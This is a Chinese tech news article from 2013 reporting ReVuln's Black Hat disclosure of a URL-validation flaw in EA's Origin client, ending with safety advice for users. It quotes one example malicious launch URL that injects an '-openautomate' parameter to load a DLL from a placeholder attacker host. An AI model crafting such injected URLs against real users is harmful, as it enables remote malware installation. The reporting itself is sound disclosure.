新闻中心

当前位置 > 新闻中心> 游戏世界 > PC游戏 > EA又中枪:Origin平台被曝安全漏洞
EA又中枪:Origin平台被曝安全漏洞
2013-03-19 12:00:10  作者:小路 编辑:小路   点击可以复制本篇文章的标题和链接
 
让小伙伴们也看看:
收藏文章

名为ReVuln的计算机安全公司曾在去年曝光了Steam平台存在URL地址访问安全漏洞,现在该公司再次在阿姆斯特丹召开的Black Hat安全会议上指出EA的Origin平台同样具有类似的问题。

ReVuln公司的研究人员表示,在经过多次测试之后证明,Origin平台的URL验证机制存在漏洞,黑客可以利用这一漏洞推送假冒URL链接来向玩家计算机中安装恶意程序。

通常来说,玩家在试图通过Origin启动游戏时,客户端会先向服务器请求一个用来启动游戏的URL地址,比如:origin://LaunchGame/[GameID],而如果该地址被黑客拦截并替换成包含有不良内容的加链接,比如:origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll,那么一旦玩家执行启动游戏操作时便会导致自己的计算机遭遇安全风险。

不过,研究人员也表示,虽然Origin平台自身具有这样的安全机制缺陷,但黑客想要通过这种方式对用户发起攻击也并非易于反掌,因为目前大多浏览器产品都具有非法URL过滤拦截功能,所以为了确保计算机的安全,用户一定要保证打开相关的浏览器安全功能,并且安装有最新版的防病毒软件,同时拒绝访问那些不熟悉的URL地址。

EA又中枪:Origin平台被曝安全漏洞

文章纠错

微信公众号搜索"驱动之家"加关注,每日最新的手机、电脑、汽车、智能硬件信息可以让你一手全掌握。推荐关注!【微信扫描下图可直接关注

阅读更多:EA

好文共享:
收藏文章

文章观点支持

当前平均分:0(0 次打分)
热门评论
热门文章